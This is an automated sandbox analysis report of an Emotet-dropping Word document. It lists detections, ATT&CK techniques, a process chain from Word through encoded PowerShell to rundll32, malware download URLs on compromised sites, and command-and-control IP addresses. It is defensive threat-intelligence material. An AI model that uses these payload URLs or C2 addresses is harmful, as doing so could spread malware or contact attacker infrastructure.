                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information21LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API2Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCommand and Scripting Interpreter111Network Logon ScriptNetwork Logon ScriptMasquerading21LSA SecretsSecurity Software Discovery121SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaPowerShell4Rc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsVirtualization/Sandbox Evasion2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 336957 Sample: Info.doc Startdate: 07/01/2021 Architecture: WINDOWS Score: 100 58 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->58 60 Multi AV Scanner detection for domain / URL 2->60 62 Antivirus detection for URL or domain 2->62 64 13 other signatures 2->64 14 cmd.exe 2->14         started        17 WINWORD.EXE 436 30 2->17         started        process3 file4 78 Suspicious powershell command line found 14->78 80 Very long command line found 14->80 82 Encrypted powershell cmdline option found 14->82 84 PowerShell case anomaly found 14->84 20 powershell.exe 16 13 14->20         started        25 msg.exe 14->25         started        50 C:\Users\user\Desktop\~$Info.doc, data 17->50 dropped signatures5 process6 dnsIp7 54 dagranitegiare.com 45.119.81.203, 443, 49165 LVSS-AS-VNLongVanSystemSolutionJSCVN Viet Nam 20->54 52 C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll, PE32 20->52 dropped 68 Powershell drops PE file 20->68 27 rundll32.exe 20->27         started        file8 signatures9 process10 process11 29 rundll32.exe 2 27->29         started        signatures12 76 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->76 32 rundll32.exe 1 29->32         started        process13 signatures14 56 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->56 35 rundll32.exe 1 32->35         started        process15 signatures16 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->66 38 rundll32.exe 1 35->38         started        process17 signatures18 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->70 41 rundll32.exe 1 38->41         started        process19 signatures20 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->72 44 rundll32.exe 1 41->44         started        process21 signatures22 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->74 47 rundll32.exe 44->47         started        process23 signatures24 86 Hides that the sample has been downloaded from the Internet (zone.identifier) 47->86

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Info.doc70%VirustotalBrowse
                      Info.doc56%ReversingLabsDocument-Word.Trojan.Valyria

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll100%Joe Sandbox ML
                      C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll93%ReversingLabsWin32.Trojan.Emotet

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      12.2.rundll32.exe.1b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.2c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.2.rundll32.exe.1d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.270000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.2.rundll32.exe.200000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.2.rundll32.exe.190000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.3a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.2.rundll32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.2.rundll32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.2.rundll32.exe.240000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      8.2.rundll32.exe.690000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.220000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.6b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.rundll32.exe.1f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.2c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.2.rundll32.exe.1c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      8.2.rundll32.exe.6b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.380000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.2a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      dagranitegiare.com8%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://167.71.148.58:443/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/0%Avira URL Cloudsafe
                      https://dagranitegiare.com/wp-admin/jCH/17%VirustotalBrowse
                      https://dagranitegiare.com/wp-admin/jCH/100%Avira URL Cloudmalware
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      https://dagranitegiare.com/wp-admin/jCH/P100%Avira URL Cloudmalware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://zhongshixingchuang.com/wp-admin/OTm/15%VirustotalBrowse
                      http://zhongshixingchuang.com/wp-admin/OTm/100%Avira URL Cloudmalware
                      http://r3.i.lencr.org/00%Avira URL Cloudsafe
                      http://koreankidsedu.com/wp-content/2cQTh/100%Avira URL Cloudmalware
                      http://www.greaudstudio.com/docs/FGn/100%Avira URL Cloudmalware
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      https://dagranitegiare.com100%Avira URL Cloudphishing
                      http://geoffoglemusic.com/wp-admin/x/100%Avira URL Cloudmalware
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://suriagrofresh.com/serevers/MVDjI/100%Avira URL Cloudmalware
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      dagranitegiare.com
                      		45.119.81.203
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://167.71.148.58:443/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpfalse
                        		high
                        http://investor.msn.compowershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpfalse
                          		high
                          http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpfalse
                            		high
                            http://crl.entrust.net/server1.crl0powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpfalse
                              		high
                              https://dagranitegiare.com/wp-admin/jCH/powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmptrue
                              • 17%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              http://cps.letsencrypt.org0powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://ocsp.entrust.net03powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://dagranitegiare.com/wp-admin/jCH/Ppowershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.hotmail.com/oepowershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpfalse
                                		high
                                http://zhongshixingchuang.com/wp-admin/OTm/powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmptrue
                                • 15%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                		unknown
                                http://r3.i.lencr.org/0powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://koreankidsedu.com/wp-content/2cQTh/powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkpowershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.greaudstudio.com/docs/FGn/powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.icra.org/vocabulary/.powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2096214706.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098993097.0000000002930000.00000002.00000001.sdmpfalse
                                    		high
                                    https://dagranitegiare.compowershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: phishing
                                    		unknown
                                    http://investor.msn.com/powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpfalse
                                      		high
                                      http://geoffoglemusic.com/wp-admin/x/powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://r3.o.lencr.org0powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.%s.comPApowershell.exe, 00000005.00000002.2096214706.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098993097.0000000002930000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101133353.0000000002800000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		low
                                      http://ocsp.entrust.net0Dpowershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://secure.comodo.com/CPS0powershell.exe, 00000005.00000002.2104542311.000000001B568000.00000004.00000001.sdmpfalse
                                        		high
                                        https://suriagrofresh.com/serevers/MVDjI/powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://servername/isapibackend.dllpowershell.exe, 00000005.00000002.2106930484.000000001D360000.00000002.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://crl.entrust.net/2048ca.crl0powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpfalse
                                          		high
                                          http://cps.root-x1.letsencrypt.org0powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          167.71.148.58
                                          		unknownUnited States
                                          		14061DIGITALOCEAN-ASNUStrue
                                          202.187.222.40
                                          		unknownMalaysia
                                          		9930TTNET-MYTIMEdotComBerhadMYtrue
                                          45.119.81.203
                                          		unknownViet Nam
                                          		131386LVSS-AS-VNLongVanSystemSolutionJSCVNtrue
                                          184.66.18.83
                                          		unknownCanada
                                          		6327SHAWCAtrue

                                          General Information

                                          Joe Sandbox Version:31.0.0 Red Diamond
                                          Analysis ID:336957
                                          Start date:07.01.2021
                                          Start time:13:42:25
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 13m 33s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:Info.doc
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:25
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • GSI enabled (VBA)
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winDOC@42/15@1/4
                                          EGA Information:
                                          • Successful, ratio: 50%
                                          HDC Information:
                                          • Successful, ratio: 81.1% (good quality ratio 74.5%)
                                          • Quality average: 72.1%
                                          • Quality standard deviation: 29.8%
                                          HCA Information:
                                          • Successful, ratio: 93%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .doc
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Found warning dialog
                                          • Click Ok
                                          • Attach to Office via COM
                                          • Scroll down
                                          • Close Viewer
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                          • TCP Packets have been reduced to 100
                                          • Excluded IPs from analysis (whitelisted): 192.35.177.64, 93.184.221.240
                                          • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, wu.azureedge.net
                                          • Execution Graph export aborted for target powershell.exe, PID 2312 because it is empty
                                          • Execution Graph export aborted for target rundll32.exe, PID 2240 because there are no executed function
                                          • Execution Graph export aborted for target rundll32.exe, PID 2448 because there are no executed function
                                          • Execution Graph export aborted for target rundll32.exe, PID 2480 because there are no executed function
                                          • Execution Graph export aborted for target rundll32.exe, PID 260 because there are no executed function
                                          • Execution Graph export aborted for target rundll32.exe, PID 2804 because there are no executed function
                                          • Execution Graph export aborted for target rundll32.exe, PID 912 because there are no executed function
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          13:42:37API Interceptor1x Sleep call for process: msg.exe modified
                                          13:42:38API Interceptor62x Sleep call for process: powershell.exe modified
                                          13:42:45API Interceptor568x Sleep call for process: rundll32.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          167.71.148.5809922748 2020 909_3553.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/hmj5vtnwvmoed5al/v2rzu19kezl4ociy/lwcymauesm35l/scrqoykcge7ozr/lwmckdg2s4/
                                          info-29-122020.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/qk90ciyt532x3l/3frjvkqc2dudu/bwrw/
                                          79685175.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/ddfeddgtlve8/qea5xg5lugywunnrb/3fep6lwfy/5iyhveusfl/walzhzdp/
                                          INV750178 281220.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/n8j7z917hs/
                                          ARCHIVOFile-2020-IM-65448896.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/dz0y/
                                          MENSAJE_29_2020.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/9kb8jd09jfjjzu6p/710krlahr1w7x1ai4dw/vrx55jw5pft/29cpm1xmdw/44c4i7/
                                          MENSAJE_29_2020.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/9d9qfmnts3/vjvjz2rwjwd3/kruxv/r53q9e331/vmffjrhd6r8m0no7f0/
                                          MENSAJE.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/r8a9ihd5x7y9gubs/0w29tdx9/w9aqw0fel8ghiol/
                                          ARCH.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/yndmmlzko00/thlmglu2/litlfgg7al5t/7c2tfqo837z45f/
                                          naamloos-40727_8209243962.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/qov6j8tqrxo/qmy5tpwx15euwz50u/etk5u/er4m7h0jkgtu0lqulo/0npx0hy2i/yjsj5l2i/
                                          arc-20201229-07546.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/rmc2rtnzt4/fga45dyk3awr/2sr766n207t/
                                          FIL_49106127 528164.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/10uvse7/v0kinw131/ed37ws4ddndv1iwbh9/a3yymy4k79ii39ps/
                                          Adjunto_2020_UH-13478.docGet hashmaliciousBrowse
